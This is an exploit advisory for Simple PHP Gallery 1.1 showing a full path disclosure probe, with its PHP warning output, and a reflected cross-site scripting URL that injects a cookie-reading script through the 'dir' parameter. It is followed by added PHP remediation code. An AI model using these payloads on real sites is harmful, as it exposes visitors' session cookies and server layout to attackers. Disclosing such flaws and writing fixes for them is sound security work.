+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker
+
+Script : Simple PHP Gallery 1.1
+Impact : Cross site scripting & fullpath disclosure
+
+
+Fullpath disclosure :
+
+http://localhost/sp_index.php?dir=[Somethingwrong]
+
+Result
+
+
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10
+
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11
+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147
+
+
+
+
+Cross Site Scripting
+
+
+
+The dir variable is not properly validated and can be used to inject HTML and JavaScript code into the page
+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>
+
+/Milw0rm
+
+
+in subject hot : Cross site scripting & fullpath disclosure ;)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
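
The advisory does not show the script's source, so the following is an added example (not code from Simple PHP Gallery or from the advisory's author) of handling a `dir` parameter so that neither the path-revealing warnings nor the reflected markup occur. `GALLERY_ROOT`, `resolve_gallery_dir()` and `h()` are hypothetical names, and the album location is an assumption.

```php
<?php
declare(strict_types=1);

const GALLERY_ROOT = __DIR__ . '/images'; // assumed album root (hypothetical)

// Map the user-supplied "dir" value to a real directory under GALLERY_ROOT.
// Returns null for anything that does not exist or that escapes the root.
function resolve_gallery_dir(string $dir): ?string
{
    $root = realpath(GALLERY_ROOT);
    if ($root === false || strpos($dir, "\0") !== false) {
        return null;
    }
    // realpath() returns false for a missing path without emitting a warning
    // and collapses "../" sequences, which makes the prefix check meaningful.
    $path = realpath($root . DIRECTORY_SEPARATOR . $dir);
    if ($path === false || !is_dir($path)) {
        return null;
    }
    // Accept only the root itself or a directory strictly below it.
    $inside = $path === $root || strpos($path, $root . DIRECTORY_SEPARATOR) === 0;
    return $inside ? $path : null;
}

// Escape a value for an HTML text or attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// PHP errors go to the server log, never into the response body.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$dir  = isset($_GET['dir']) && is_string($_GET['dir']) ? $_GET['dir'] : '';
$path = resolve_gallery_dir($dir);
if ($path === null) {
    http_response_code(404);
    echo '<p>Album not found.</p>'; // generic: no input echoed, no path shown
    exit;
}
echo '<h1>', h($dir), '</h1><ul>';
foreach (scandir($path) ?: [] as $entry) {
    if ($entry[0] !== '.') {
        echo '<li>', h($entry), '</li>';
    }
}
echo '</ul>';
```

The directory is validated before `opendir()`-style calls are reached, so a bad value produces a generic 404 instead of warnings, and every value written into the page passes through `h()`.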